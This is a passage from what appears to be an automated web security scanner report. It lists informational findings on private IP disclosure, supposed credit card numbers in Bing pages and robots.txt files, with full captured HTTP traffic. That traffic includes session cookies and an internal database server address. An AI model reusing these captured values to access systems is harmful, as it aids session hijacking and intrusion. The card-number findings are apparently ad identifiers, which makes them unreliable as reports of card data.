Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.8.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 25511
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:36 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:36 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
<script type="text/javascript">
   var _SGSV = {
       ai:'',
       pi:'',
       mi:'NOMEMBER',
       si:'CB37911B-6349-45F9-8E60-626BA164D748',
       db:'172.16.1.9,1433',
       homeid:'A25478AA-97CD-4A2F-AB15-301619B3848F',
       
       chat:false
       
   };
   var _SKYAUTH = {
    loginUrl:'http://afreshbunch.com/?page=login',
    memberNick:'',
   

   
...[SNIP]...

25.5. http://player.vimeo.com/config/14606948  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /config/14606948

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /config/14606948?type=moogaloop_embed&referrer=http%3A%2F%2Fwww.hugthecloud.com%2F&fullscreen=1&color=00ADEF&autoplay=0&server=vimeo.com&show_title=1&loop=0&show_byline=1&player_server=player.vimeo.com&show_portrait=1&cdn_server=a.vimeocdn.com HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://vimeo.com/moogaloop.swf?clip_id=14606948&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00ADEF&fullscreen=1&autoplay=0&loop=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256147786.1303747424.3.3.utmcsr=customermagnetism.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=256147786.658057560.1303432520.1303575918.1303747424.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Server: 10.90.6.238
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/json
Content-Length: 2431

{"request":{"cached_timestamp":1303823915,"source":"cache","signature":"7a5b414ea87a6bcf44ce6f76414929ed","timestamp":1303823916,"referrer":"http:\/\/www.hugthecloud.com\/","vimeo_url":"vimeo.com","pl
...[SNIP]...

25.6. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=14606948&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00ADEF&fullscreen=1&autoplay=0&loop=0 HTTP/1.1
Host: vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.hugthecloud.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Tue, 26 Apr 2011 01:18:32 GMT
X-Server: 10.90.6.191
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 280

FWS.....p...........?........
.http%3A%2F%2Fwww.hugthecloud.com%2F.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogal
...[SNIP]...

25.7. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38736
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:42:59 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=; path=/
Set-Cookie: ASPSESSIONIDSSTDDTRS=GEADHBADIKBEHFGIANJELJKN; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:43:58 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<script type="text/javascript">
   var _SGSV = {
       ai:'',
       pi:'A25478AA-97CD-4A2F-AB15-301619B3848F',
       mi:'NOMEMBER',
       si:'CB37911B-6349-45F9-8E60-626BA164D748',
       db:'172.16.1.9,1433',
       homeid:'A25478AA-97CD-4A2F-AB15-301619B3848F',
       
       chat:false
       
   };
   var _SKYAUTH = {
    loginUrl:'http://afreshbunch.com/?page=login',
    memberNick:'',
   
   
...[SNIP]...

25.8. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.232.46
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:29 GMT
Content-Length: 0


25.9. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.249.46
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:02 GMT
Content-Length: 0


25.10. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.44
X-Cnection: close
Date: Tue, 26 Apr 2011 14:20:15 GMT
Content-Length: 0


25.11. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.229.49
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:13 GMT
Content-Length: 0


25.12. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.26.63
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:02 GMT
Content-Length: 8460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

25.13. http://www.google.com/sdch/rU20-FBA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT
If-Modified-Since: Mon, 25 Apr 2011 23:04:14 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 26 Apr 2011 09:44:58 GMT
Date: Tue, 26 Apr 2011 13:04:29 GMT
Expires: Tue, 26 Apr 2011 13:04:29 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...

26. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:


26.1. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /search?q=unified+threat+management&go=&form=QBLH&qs=n&sk= HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; RMS=F=Gg&A=AAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999&bIm=193; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:54:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<a class="sa_cpt" u="7|1070|4584937912402038|2925b22a,a305f9aa">
...[SNIP]...

26.2. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /search?q=email+spam+virus&go=&form=QBRE&qs=n&sk=&sc=8-4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=unified+threat+management&go=&form=QBLH&qs=n&sk=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=OgAg&A=QAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=987&CH=983&bIm=193&hIm=983

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:54:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<a class="sa_cpt" u="9|1090|4627316351238311|ea933c68,c25a585c">
...[SNIP]...

26.3. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /search?q=spam+virus+block&go=&form=QBRE&qs=n&sk=&sc=8-10 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=email+spam+virus&go=&form=QBRE&qs=n&sk=&sc=8-4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=OgAg&A=QAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=987&CH=940&bIm=193&hIm=983

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:20:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 29107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<a class="sa_cpt" u="7|1070|5010414546650904|e6818dcc,da6f39fa">
...[SNIP]...

27. Robots.txt file  previous  next
There are 44 instances of this issue:


27.1. http://172-vim-170.mktoresp.com/webevents/visitWebPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://172-vim-170.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 172-vim-170.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:14:53 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 03:41:11 GMT
ETag: "c2e663-18-49d9feac543c0"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.2. https://account.snap.com/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: account.snap.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:03:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Last-Modified: Thu, 24 Apr 2008 15:56:08 GMT
ETag: "313267f-1a-44ba07cd49600"
Accept-Ranges: bytes
Content-Length: 26
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.3. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 26 Apr 2011 11:34:22 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

27.4. http://bridgefront.com/products_custom_course_development.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bridgefront.com
Path:   /products_custom_course_development.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bridgefront.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 Jan 2011 20:48:22 GMT
ETag: "2c98582-21b-5eedf180"
Accept-Ranges: bytes
Content-Length: 539
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /images
Disallow: /cgi-bin
Disallow: /inc
Disallow: /WysiwygPro
Disallow: /thankyou
Disallow: /downloads
Disallow: /connections
Disallow: /courseselect
Disallow: /demousers
D
...[SNIP]...

27.5. http://clients1.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 26 Apr 2011 00:43:26 GMT
Expires: Tue, 26 Apr 2011 00:43:26 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.6. http://data.cmcore.com/cookie-id.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /cookie-id.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.cmcore.com

Response

HTTP/1.1 200 OK
